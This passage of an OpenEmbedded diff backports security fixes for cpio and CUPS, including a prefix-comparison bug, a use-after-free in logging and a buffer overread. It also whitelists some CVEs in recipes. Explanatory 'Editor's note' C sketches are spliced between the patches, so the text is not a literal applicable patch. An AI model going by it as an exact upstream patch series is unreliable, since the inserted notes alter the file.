+ dirname_len = strlen (directory_name);
+ if (change_directory_option && !ISSLASH (directory_name[0]))
+ {
+ char *pwd = xgetcwd ();
+-
+- dirname_len += strlen (pwd) + 1;
+- ds_init (&output_name, dirname_len + 2);
+- strcpy (output_name.ds_string, pwd);
+- strcat (output_name.ds_string, "/");
+- strcat (output_name.ds_string, directory_name);
++
++ ds_concat (&output_name, pwd);
++ ds_append (&output_name, '/');
+ }
+- else
+- {
+- ds_init (&output_name, dirname_len + 2);
+- strcpy (output_name.ds_string, directory_name);
+- }
+- output_name.ds_string[dirname_len] = '/';
++ ds_concat (&output_name, directory_name);
++ ds_append (&output_name, '/');
++ dirname_len = ds_len (&output_name);
+ output_is_seekable = true;
+
+ change_dir ();
+@@ -116,8 +111,8 @@ process_copy_pass ()
+ /* Make the name of the new file. */
+ for (slash = input_name.ds_string; *slash == '/'; ++slash)
+ ;
+- ds_resize (&output_name, dirname_len + strlen (slash) + 2);
+- strcpy (output_name.ds_string + dirname_len + 1, slash);
++ ds_reset (&output_name, dirname_len);
++ ds_concat (&output_name, slash);
+
+ existing_dir = false;
+ if (lstat (output_name.ds_string, &out_file_stat) == 0)
+@@ -333,6 +328,9 @@ process_copy_pass ()
+ (unsigned long) blocks),
+ (unsigned long) blocks);
+ }
++
++ ds_free (&input_name);
++ ds_free (&output_name);
+ }
+
+ /* Try and create a hard link from FILE_NAME to another file
+diff --git a/src/dstring.c b/src/dstring.c
+index e9c063f..358f356 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -20,8 +20,8 @@
+ #if defined(HAVE_CONFIG_H)
+ # include <config.h>
+ #endif
+-
+ #include <stdio.h>
++#include <stdlib.h>
+ #if defined(HAVE_STRING_H) || defined(STDC_HEADERS)
+ #include <string.h>
+ #else
+@@ -33,24 +33,41 @@
+ /* Initialiaze dynamic string STRING with space for SIZE characters. */
+
+ void
+-ds_init (dynamic_string *string, int size)
++ds_init (dynamic_string *string)
++{
++ memset (string, 0, sizeof *string);
++}
++
++/* Free the dynamic string storage. */
++
++void
++ds_free (dynamic_string *string)
+ {
+- string->ds_length = size;
+- string->ds_string = (char *) xmalloc (size);
++ free (string->ds_string);
+ }
+
+-/* Expand dynamic string STRING, if necessary, to hold SIZE characters. */
++/* Expand dynamic string STRING, if necessary. */
+
+ void
+-ds_resize (dynamic_string *string, int size)
++ds_resize (dynamic_string *string)
+ {
+- if (size > string->ds_length)
++ if (string->ds_idx == string->ds_size)
+ {
+- string->ds_length = size;
+- string->ds_string = (char *) xrealloc ((char *) string->ds_string, size);
++ string->ds_string = x2nrealloc (string->ds_string, &string->ds_size,
++ 1);
+ }
+ }
+
++/* Reset the index of the dynamic string S to LEN. */
++
++void
++ds_reset (dynamic_string *s, size_t len)
++{
++ while (len > s->ds_size)
++ ds_resize (s);
++ s->ds_idx = len;
++}
++
+ /* Dynamic string S gets a string terminated by the EOS character
+ (which is removed) from file F. S will increase
+ in size during the function if the string from F is longer than
+@@ -61,34 +78,50 @@ ds_resize (dynamic_string *string, int size)
+ char *
+ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+ {
+- int insize; /* Amount needed for line. */
+- int strsize; /* Amount allocated for S. */
+ int next_ch;
+
+ /* Initialize. */
+- insize = 0;
+- strsize = s->ds_length;
++ s->ds_idx = 0;
+
+ /* Read the input string. */
+- next_ch = getc (f);
+- while (next_ch != eos && next_ch != EOF)
++ while ((next_ch = getc (f)) != eos && next_ch != EOF)
+ {
+- if (insize >= strsize - 1)
+- {
+- ds_resize (s, strsize * 2 + 2);
+- strsize = s->ds_length;
+- }
+- s->ds_string[insize++] = next_ch;
+- next_ch = getc (f);
++ ds_resize (s);
++ s->ds_string[s->ds_idx++] = next_ch;
+ }
+- s->ds_string[insize++] = '\0';
++ ds_resize (s);
++ s->ds_string[s->ds_idx] = '\0';
+
+- if (insize == 1 && next_ch == EOF)
++ if (s->ds_idx == 0 && next_ch == EOF)
+ return NULL;
+ else
+ return s->ds_string;
+ }
+
++void
++ds_append (dynamic_string *s, int c)
++{
++ ds_resize (s);
++ s->ds_string[s->ds_idx] = c;
++ if (c)
++ {
++ s->ds_idx++;
++ ds_resize (s);
++ s->ds_string[s->ds_idx] = 0;
++ }
++}
++
++void
++ds_concat (dynamic_string *s, char const *str)
++{
++ size_t len = strlen (str);
++ while (len + 1 > s->ds_size)
++ ds_resize (s);
++ memcpy (s->ds_string + s->ds_idx, str, len);
++ s->ds_idx += len;
++ s->ds_string[s->ds_idx] = 0;
++}
++
+ char *
+ ds_fgets (FILE *f, dynamic_string *s)
+ {
+@@ -100,3 +133,10 @@ ds_fgetname (FILE *f, dynamic_string *s)
+ {
+ return ds_fgetstr (f, s, '\0');
+ }
++
++/* Return true if the dynamic string S ends with character C. */
++int
++ds_endswith (dynamic_string *s, int c)
++{
++ return (s->ds_idx > 0 && s->ds_string[s->ds_idx - 1] == c);
++}
+diff --git a/src/dstring.h b/src/dstring.h
+index b5135fe..f5b04ef 100644
+--- a/src/dstring.h
++++ b/src/dstring.h
+@@ -17,10 +17,6 @@
+ Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
+ Boston, MA 02110-1301 USA. */
+
+-#ifndef NULL
+-#define NULL 0
+-#endif
+-
+ /* A dynamic string consists of record that records the size of an
+ allocated string and the pointer to that string. The actual string
+ is a normal zero byte terminated string that can be used with the
+@@ -30,22 +26,25 @@
+
+ typedef struct
+ {
+- int ds_length; /* Actual amount of storage allocated. */
+- char *ds_string; /* String. */
++ size_t ds_size; /* Actual amount of storage allocated. */
++ size_t ds_idx; /* Index of the next free byte in the string. */
++ char *ds_string; /* String storage. */
+ } dynamic_string;
+
++#define DYNAMIC_STRING_INITIALIZER { 0, 0, NULL }
+
+-/* Macros that look similar to the original string functions.
+- WARNING: These macros work only on pointers to dynamic string records.
+- If used with a real record, an "&" must be used to get the pointer. */
+-#define ds_strlen(s) strlen ((s)->ds_string)
+-#define ds_strcmp(s1, s2) strcmp ((s1)->ds_string, (s2)->ds_string)
+-#define ds_strncmp(s1, s2, n) strncmp ((s1)->ds_string, (s2)->ds_string, n)
+-#define ds_index(s, c) index ((s)->ds_string, c)
+-#define ds_rindex(s, c) rindex ((s)->ds_string, c)
++void ds_init (dynamic_string *string);
++void ds_free (dynamic_string *string);
++void ds_reset (dynamic_string *s, size_t len);
+
+-void ds_init (dynamic_string *string, int size);
+-void ds_resize (dynamic_string *string, int size);
++/* All functions below guarantee that s->ds_string[s->ds_idx] == '\0' */
+ char *ds_fgetname (FILE *f, dynamic_string *s);
+ char *ds_fgets (FILE *f, dynamic_string *s);
+ char *ds_fgetstr (FILE *f, dynamic_string *s, char eos);
++void ds_append (dynamic_string *s, int c);
++void ds_concat (dynamic_string *s, char const *str);
++
++#define ds_len(s) ((s)->ds_idx)
++
++int ds_endswith (dynamic_string *s, int c);
++
+diff --git a/src/util.c b/src/util.c
+index 4421b20..6d6bbaa 100644
+--- a/src/util.c
++++ b/src/util.c
+@@ -846,11 +846,9 @@ get_next_reel (int tape_des)
+ FILE *tty_out; /* File for interacting with user. */
+ int old_tape_des;
+ char *next_archive_name;
+- dynamic_string new_name;
++ dynamic_string new_name = DYNAMIC_STRING_INITIALIZER;
+ char *str_res;
+
+- ds_init (&new_name, 128);
+-
+ /* Open files for interactive communication. */
+ tty_in = fopen (TTY_NAME, "r");
+ if (tty_in == NULL)
+@@ -925,7 +923,7 @@ get_next_reel (int tape_des)
+ error (PAXEXIT_FAILURE, 0, _("internal error: tape descriptor changed from %d to %d"),
+ old_tape_des, tape_des);
+
+- free (new_name.ds_string);
++ ds_free (&new_name);
+ fclose (tty_in);
+ fclose (tty_out);
+ }
+--
+2.25.1
+
+
+From fb7a51bf85b8e6f045cacb4fb783db4a414741bf Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Wed, 11 Aug 2021 18:10:38 +0300
+Subject: [PATCH 2/3] Fix previous commit
+
+* src/dstring.c (ds_reset,ds_concat): Don't call ds_resize in a
+loop.
+---
+ src/dstring.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/dstring.c b/src/dstring.c
+index 358f356..90c691c 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -64,7 +64,7 @@ void
+ ds_reset (dynamic_string *s, size_t len)
+ {
+ while (len > s->ds_size)
+- ds_resize (s);
++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
+ s->ds_idx = len;
+ }
+
+@@ -116,7 +116,7 @@ ds_concat (dynamic_string *s, char const *str)
+ {
+ size_t len = strlen (str);
+ while (len + 1 > s->ds_size)
+- ds_resize (s);
++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
+ memcpy (s->ds_string + s->ds_idx, str, len);
+ s->ds_idx += len;
+ s->ds_string[s->ds_idx] = 0;
+--
+2.25.1
+
+
+From 86b37d74b15f9bb5fe62fd1642cc126d3ace0189 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Wed, 18 Aug 2021 09:41:39 +0300
+Subject: [PATCH 3/3] Fix dynamic string reallocations
+
+* src/dstring.c (ds_resize): Take additional argument: number of
+bytes to leave available after ds_idx. All uses changed.
+---
+ src/dstring.c | 18 ++++++++----------
+ 1 file changed, 8 insertions(+), 10 deletions(-)
+
+diff --git a/src/dstring.c b/src/dstring.c
+index 90c691c..0f597cc 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -49,9 +49,9 @@ ds_free (dynamic_string *string)
+ /* Expand dynamic string STRING, if necessary. */
+
+ void
+-ds_resize (dynamic_string *string)
++ds_resize (dynamic_string *string, size_t len)
+ {
+- if (string->ds_idx == string->ds_size)
++ while (len + string->ds_idx >= string->ds_size)
+ {
+ string->ds_string = x2nrealloc (string->ds_string, &string->ds_size,
+ 1);
+@@ -63,8 +63,7 @@ ds_resize (dynamic_string *string)
+ void
+ ds_reset (dynamic_string *s, size_t len)
+ {
+- while (len > s->ds_size)
+- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
++ ds_resize (s, len);
+ s->ds_idx = len;
+ }
+
+@@ -86,10 +85,10 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+ /* Read the input string. */
+ while ((next_ch = getc (f)) != eos && next_ch != EOF)
+ {
+- ds_resize (s);
++ ds_resize (s, 0);
+ s->ds_string[s->ds_idx++] = next_ch;
+ }
+- ds_resize (s);
++ ds_resize (s, 0);
+ s->ds_string[s->ds_idx] = '\0';
+
+ if (s->ds_idx == 0 && next_ch == EOF)
+@@ -101,12 +100,12 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+ void
+ ds_append (dynamic_string *s, int c)
+ {
+- ds_resize (s);
++ ds_resize (s, 0);
+ s->ds_string[s->ds_idx] = c;
+ if (c)
+ {
+ s->ds_idx++;
+- ds_resize (s);
++ ds_resize (s, 0);
+ s->ds_string[s->ds_idx] = 0;
+ }
+ }
+@@ -115,8 +114,7 @@ void
+ ds_concat (dynamic_string *s, char const *str)
+ {
+ size_t len = strlen (str);
+- while (len + 1 > s->ds_size)
+- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
++ ds_resize (s, len);
+ memcpy (s->ds_string + s->ds_idx, str, len);
+ s->ds_idx += len;
+ s->ds_string[s->ds_idx] = 0;
+--
+2.25.1
+
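Editor's note: the net effect of the three cpio patches above is a small dynamic-string API that always keeps the buffer NUL-terminated and grows it on demand. The following driver is only an illustrative sketch; it assumes the patched src/dstring.c and src/dstring.h (plus gnulib's x2nrealloc) are compiled in, and is not part of the patches or the recipe.

    /* sketch: exercise the patched dynamic_string API (assumes dstring.h/.c) */
    #include <stdio.h>
    #include "dstring.h"

    int main (void)
    {
      dynamic_string name = DYNAMIC_STRING_INITIALIZER;

      ds_concat (&name, "backup");   /* grows storage as needed */
      ds_append (&name, '.');
      ds_concat (&name, "cpio");

      if (ds_endswith (&name, 'o'))
        printf ("%s (%zu chars)\n", name.ds_string, ds_len (&name));

      ds_free (&name);
      return 0;
    }
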
diff --git a/meta/recipes-extended/cpio/cpio_2.13.bb b/meta/recipes-extended/cpio/cpio_2.13.bb
index 9e35a80f8b..5ab567f360 100644
--- a/meta/recipes-extended/cpio/cpio_2.13.bb
+++ b/meta/recipes-extended/cpio/cpio_2.13.bb
@@ -9,6 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f27defe1e96c2e1ecd4e0c9be8967949"
SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \
file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \
+ file://CVE-2021-38185.patch \
+ file://0003-Fix-calculation-of-CRC-in-copy-out-mode.patch \
+ file://0004-Fix-appending-to-archives-bigger-than-2G.patch \
"
SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810"
@@ -16,6 +19,9 @@ SRC_URI[sha256sum] = "e87470d9c984317f658567c03bfefb6b0c829ff17dbf6b0de48d71a4c8
inherit autotools gettext texinfo
+# Issue applies to use of cpio in SUSE/OBS, doesn't apply to us
+CVE_CHECK_WHITELIST += "CVE-2010-4226"
+
EXTRA_OECONF += "DEFAULT_RMT_DIR=${sbindir}"
do_install () {
diff --git a/meta/recipes-extended/cracklib/cracklib_2.9.5.bb b/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
index 82995219dc..9cdb71f1a1 100644
--- a/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
+++ b/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
@@ -1,5 +1,6 @@
SUMMARY = "Password strength checker library"
-HOMEPAGE = "http://sourceforge.net/projects/cracklib"
+HOMEPAGE = "https://github.com/cracklib/cracklib"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=e3eda01d9815f8d24aae2dbd89b68b06"
diff --git a/meta/recipes-extended/cups/cups.inc b/meta/recipes-extended/cups/cups.inc
index c5a60bde12..6cfe314f20 100644
--- a/meta/recipes-extended/cups/cups.inc
+++ b/meta/recipes-extended/cups/cups.inc
@@ -13,11 +13,23 @@ SRC_URI = "https://github.com/apple/cups/releases/download/v${PV}/${BP}-source.t
file://0002-don-t-try-to-run-generated-binaries.patch \
file://0003-cups_1.4.6.bb-Fix-build-on-ppc64.patch \
file://0004-cups-fix-multilib-install-file-conflicts.patch\
+ file://CVE-2022-26691.patch \
+ file://CVE-2023-32324.patch \
+ file://CVE-2023-34241.patch \
+ file://CVE-2023-32360.patch \
+ file://CVE-2023-4504.patch \
"
UPSTREAM_CHECK_URI = "https://github.com/apple/cups/releases"
UPSTREAM_CHECK_REGEX = "cups-(?P<pver>\d+\.\d+(\.\d+)?)-source.tar"
+# Issue only applies to MacOS
+CVE_CHECK_WHITELIST += "CVE-2008-1033"
+# Issue affects the pdfdistiller plugin, which is used with but not part of cups
+CVE_CHECK_WHITELIST += "CVE-2009-0032"
+# This is an Ubuntu only issue.
+CVE_CHECK_WHITELIST += "CVE-2018-6553"
+
LEAD_SONAME = "libcupsdriver.so"
CLEANBROKEN = "1"
@@ -34,7 +46,7 @@ PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'zeroconf', 'avahi',
PACKAGECONFIG[avahi] = "--enable-avahi,--disable-avahi,avahi"
PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl"
PACKAGECONFIG[pam] = "--enable-pam --with-pam-module=unix, --disable-pam, libpam"
-PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--without-systemd,systemd"
+PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--disable-systemd,systemd"
PACKAGECONFIG[xinetd] = "--with-xinetd=${sysconfdir}/xinetd.d,--without-xinetd,xinetd"
EXTRA_OECONF = " \
@@ -45,6 +57,9 @@ EXTRA_OECONF = " \
--enable-debug \
--disable-relro \
--enable-libusb \
+ --with-system-groups=lpadmin \
+ --with-cups-group=lp \
+ --with-domainsocket=/run/cups/cups.sock \
DSOFLAGS='${LDFLAGS}' \
"
@@ -106,3 +121,7 @@ SYSROOT_PREPROCESS_FUNCS += "cups_sysroot_preprocess"
cups_sysroot_preprocess () {
sed -i ${SYSROOT_DESTDIR}${bindir_crossscripts}/cups-config -e 's:cups_datadir=.*:cups_datadir=${datadir}/cups:' -e 's:cups_serverbin=.*:cups_serverbin=${libexecdir}/cups:'
}
+
+# CVE-2021-25317 concerns /var/log/cups having lp ownership. Our /var/log/cups is
+# root:root, so this doesn't apply.
+CVE_CHECK_WHITELIST += "CVE-2021-25317"
diff --git a/meta/recipes-extended/cups/cups/CVE-2022-26691.patch b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch
new file mode 100644
index 0000000000..1fa5a54c70
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch
@@ -0,0 +1,33 @@
+From de4f8c196106033e4c372dce3e91b9d42b0b9444 Mon Sep 17 00:00:00 2001
+From: Zdenek Dohnal <zdohnal@redhat.com>
+Date: Thu, 26 May 2022 06:27:04 +0200
+Subject: [PATCH] scheduler/cert.c: Fix string comparison (fixes
+ CVE-2022-26691)
+
+The previous algorithm didn't expect that the strings could have different
+lengths, so one string could be a substring of the other, and such a
+substring was reported as equal to the longer string.
+
+CVE: CVE-2022-26691
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/de4f8c196106033e4c372dce3e91b9d42b0b9444]
+Signed-off-by: Steve Sakoman
+
+---
+diff --git a/scheduler/cert.c b/scheduler/cert.c
+index b268bf1b2..9b65b96c9 100644
+--- a/scheduler/cert.c
++++ b/scheduler/cert.c
+@@ -434,5 +434,12 @@ ctcompare(const char *a, /* I - First string */
+ b ++;
+ }
+
+- return (result);
++ /*
++ * The while loop finishes when *a == '\0' or *b == '\0'
++ * so after the while loop either both *a and *b == '\0',
++ * or one points inside a string, so when we apply logical OR on *a,
++ * *b and result, we get a non-zero return value if the compared strings don't match.
++ */
++
++ return (result | *a | *b);
+ }
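Editor's note: the idea behind the one-line fix above is that a timing-safe comparison must also fail when one string is a strict prefix of the other. A minimal standalone illustration of the same pattern (simplified, with assumed names; not the actual CUPS code):

    /* sketch: constant-time style compare that also rejects prefixes */
    #include <assert.h>

    static int ct_compare (const char *a, const char *b)
    {
      int result = 0;

      while (*a && *b)
        result |= *a++ ^ *b++;

      /* if the strings differ in length, *a or *b is still non-zero here */
      return result | *a | *b;
    }

    int main (void)
    {
      assert (ct_compare ("secret", "secret") == 0);
      assert (ct_compare ("secret", "secret-longer") != 0); /* old code said "equal" */
      assert (ct_compare ("sec", "secret") != 0);
      return 0;
    }
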
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32324.patch b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch
new file mode 100644
index 0000000000..40b89c9899
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch
@@ -0,0 +1,36 @@
+From 07cbffd11107eed3aaf1c64e35552aec20f792da Mon Sep 17 00:00:00 2001
+From: Zdenek Dohnal <zdohnal@redhat.com>
+Date: Thu, 1 Jun 2023 12:04:00 +0200
+Subject: [PATCH] cups/string.c: Return if `size` is 0 (fixes CVE-2023-32324)
+
+CVE: CVE-2023-32324
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/fd8bc2d32589]
+
+(cherry picked from commit fd8bc2d32589d1fd91fe1c0521be2a7c0462109e)
+Signed-off-by: Sanjay Chitroda <schitrod@cisco.com>
+---
+ cups/string.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/cups/string.c b/cups/string.c
+index 93cdad19..6ef58515 100644
+--- a/cups/string.c
++++ b/cups/string.c
+@@ -1,6 +1,7 @@
+ /*
+ * String functions for CUPS.
+ *
++ * Copyright © 2023 by OpenPrinting.
+ * Copyright © 2007-2019 by Apple Inc.
+ * Copyright © 1997-2007 by Easy Software Products.
+ *
+@@ -730,6 +731,9 @@ _cups_strlcpy(char *dst, /* O - Destination string */
+ size_t srclen; /* Length of source string */
+
+
++ if (size == 0)
++ return (0);
++
+ /*
+ * Figure out how much room is needed...
+ */
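Editor's note: the guard added above matters because a bounded copy into a zero-sized destination must not write anything, not even the terminating NUL. A rough standalone sketch of the same pattern (simplified; not the actual _cups_strlcpy):

    /* sketch: bounded copy that tolerates size == 0 */
    #include <stdio.h>
    #include <string.h>

    static size_t bounded_copy (char *dst, const char *src, size_t size)
    {
      size_t srclen = strlen (src);

      if (size == 0)          /* nothing may be written, not even the NUL */
        return 0;

      if (srclen >= size)
        srclen = size - 1;    /* truncate, leaving room for the NUL */

      memcpy (dst, src, srclen);
      dst[srclen] = '\0';
      return srclen;
    }

    int main (void)
    {
      char buf[4];
      printf ("%zu -> \"%s\"\n", bounded_copy (buf, "cupsd", sizeof buf), buf);
      printf ("%zu\n", bounded_copy (buf, "cupsd", 0));  /* safe no-op after the fix */
      return 0;
    }
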
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32360.patch b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch
new file mode 100644
index 0000000000..4d39e1e57f
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch
@@ -0,0 +1,31 @@
+From a0c8b9c9556882f00c68b9727a95a1b6d1452913 Mon Sep 17 00:00:00 2001
+From: Michael R Sweet <michael.r.sweet@gmail.com>
+Date: Tue, 6 Dec 2022 09:04:01 -0500
+Subject: [PATCH] Require authentication for CUPS-Get-Document.
+
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/a0c8b9c9556882f00c68b9727a95a1b6d1452913]
+CVE: CVE-2023-32360
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ conf/cupsd.conf.in | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/conf/cupsd.conf.in b/conf/cupsd.conf.in
+index b258849078..a07536f3e4 100644
+--- a/conf/cupsd.conf.in
++++ b/conf/cupsd.conf.in
+@@ -68,7 +68,13 @@ IdleExitTimeout @EXIT_TIMEOUT@
+ Order deny,allow
+ </Limit>
+
+- <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job CUPS-Get-Document>
++ <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job>
++ Require user @OWNER @SYSTEM
++ Order deny,allow
++ </Limit>
++
++ <Limit CUPS-Get-Document>
++ AuthType Default
+ Require user @OWNER @SYSTEM
+ Order deny,allow
+ </Limit>
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-34241.patch b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch
new file mode 100644
index 0000000000..816efc2946
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch
@@ -0,0 +1,65 @@
+From ffd290b4ab247f82722927ba9b21358daa16dbf1 Mon Sep 17 00:00:00 2001
+From: Rose <83477269+AtariDreams@users.noreply.github.com>
+Date: Thu, 1 Jun 2023 11:33:39 -0400
+Subject: [PATCH] Log result of httpGetHostname BEFORE closing the connection
+
+httpClose frees the memory of con->http. This is problematic because httpGetHostname then tries to access the memory it points to.
+
+We have to log the hostname first.
+
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/9809947a959e18409dcf562a3466ef246cb90cb2]
+CVE: CVE-2023-34241
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ scheduler/client.c | 16 +++++++---------
+ 1 file changed, 7 insertions(+), 9 deletions(-)
+
+diff --git a/scheduler/client.c b/scheduler/client.c
+index 91e441188c..327473a4d1 100644
+--- a/scheduler/client.c
++++ b/scheduler/client.c
+@@ -193,13 +193,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
+ /*
+ * Can't have an unresolved IP address with double-lookups enabled...
+ */
+-
+- httpClose(con->http);
+-
+ cupsdLogClient(con, CUPSD_LOG_WARN,
+- "Name lookup failed - connection from %s closed!",
++ "Name lookup failed - closing connection from %s!",
+ httpGetHostname(con->http, NULL, 0));
+
++ httpClose(con->http);
+ free(con);
+ return;
+ }
+@@ -235,11 +233,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
+ * with double-lookups enabled...
+ */
+
+- httpClose(con->http);
+-
+ cupsdLogClient(con, CUPSD_LOG_WARN,
+- "IP lookup failed - connection from %s closed!",
++ "IP lookup failed - closing connection from %s!",
+ httpGetHostname(con->http, NULL, 0));
++
++ httpClose(con->http);
+ free(con);
+ return;
+ }
+@@ -256,11 +254,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
+
+ if (!hosts_access(&wrap_req))
+ {
+- httpClose(con->http);
+-
+ cupsdLogClient(con, CUPSD_LOG_WARN,
+ "Connection from %s refused by /etc/hosts.allow and "
+ "/etc/hosts.deny rules.", httpGetHostname(con->http, NULL, 0));
++
++ httpClose(con->http);
+ free(con);
+ return;
+ }
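Editor's note: the pattern being fixed above is "use the resource for logging, then release it". A tiny hypothetical sketch of the same ordering rule, outside of cupsd:

    /* sketch: always read/log from a resource before freeing it */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    struct conn { char *hostname; };

    static void conn_close (struct conn *c)
    {
      free (c->hostname);
      free (c);
    }

    int main (void)
    {
      struct conn *c = malloc (sizeof *c);
      if (!c)
        return 1;
      c->hostname = strdup ("client.example.com");

      /* correct order: read c->hostname while it is still valid ... */
      fprintf (stderr, "closing connection from %s\n", c->hostname);
      /* ... and only then release the connection */
      conn_close (c);
      return 0;
    }
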
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-4504.patch b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch
new file mode 100644
index 0000000000..be0db1fbd4
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch
@@ -0,0 +1,40 @@
+From a9a7daa77699bd58001c25df8a61a8029a217ddf Mon Sep 17 00:00:00 2001
+From: Zdenek Dohnal <zdohnal@redhat.com>
+Date: Fri, 1 Sep 2023 16:47:29 +0200
+Subject: [PATCH] raster-interpret.c: Fix CVE-2023-4504
+
+We didn't check for end of buffer if it looks there is an escaped
+character - check for NULL terminator there and if found, return NULL
+as return value and in `ptr`, because a lone backslash is not
+a valid PostScript character.
+
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/2431caddb7e6a87f04ac90b5c6366ad268b6ff31]
+CVE: CVE-2023-4504
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ cups/raster-interpret.c | 14 +++++++++++++-
+ 1 file changed, 13 insertions(+), 1 deletion(-)
+
+--- a/cups/raster-interpret.c
++++ b/cups/raster-interpret.c
+@@ -1113,7 +1113,19 @@ scan_ps(_cups_ps_stack_t *st, /* I - S
+
+ cur ++;
+
+- if (*cur == 'b')
++ /*
++ * Return NULL if we reached NULL terminator, a lone backslash
++ * is not a valid character in PostScript.
++ */
++
++ if (!*cur)
++ {
++ *ptr = NULL;
++
++ return (NULL);
++ }
++
++ if (*cur == 'b')
+ *valptr++ = '\b';
+ else if (*cur == 'f')
+ *valptr++ = '\f';
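Editor's note: the extra check above covers the case where the escape character is the last byte of the input. A minimal, self-contained sketch of the same scanning rule (hypothetical names, not the CUPS raster parser):

    /* sketch: reject a string that ends in a lone backslash */
    #include <assert.h>

    static int unescape_ok (const char *s)
    {
      while (*s)
        {
          if (*s == '\\')
            {
              s++;
              if (*s == '\0')     /* lone backslash at end of input */
                return 0;
            }
          s++;
        }
      return 1;
    }

    int main (void)
    {
      assert (unescape_ok ("a\\nb"));
      assert (!unescape_ok ("trailing\\"));
      return 0;
    }
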
diff --git a/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb b/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
index 65a99fc28d..e726899c52 100644
--- a/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
+++ b/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
@@ -1,6 +1,7 @@
SUMMARY = "Collection of autoconf m4 macros"
SECTION = "base"
HOMEPAGE = "http://sourceforge.net/projects/cwautomacros.berlios/"
+DESCRIPTION = "A collection of autoconf macros, plus an autogen.sh script that can be used with them."
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://LICENSE;md5=eb723b61539feef013de476e68b5c50a"
@@ -13,7 +14,7 @@ do_configure() {
}
do_install() {
- oe_runmake CWAUTOMACROSPREFIX=${D}${prefix} install
+ oe_runmake LABEL=`date -d @${SOURCE_DATE_EPOCH} +%Y%m%d` CWAUTOMACROSPREFIX=${D}${prefix} install
# cleanup buildpaths in autogen.sh
sed -i -e 's,${D},,g' ${D}${prefix}/share/cwautomacros/scripts/autogen.sh
diff --git a/meta/recipes-extended/ed/ed_1.15.bb b/meta/recipes-extended/ed/ed_1.15.bb
index 886c3ddcab..60e6a3d34e 100644
--- a/meta/recipes-extended/ed/ed_1.15.bb
+++ b/meta/recipes-extended/ed/ed_1.15.bb
@@ -1,5 +1,6 @@
SUMMARY = "Line-oriented text editor"
HOMEPAGE = "http://www.gnu.org/software/ed/"
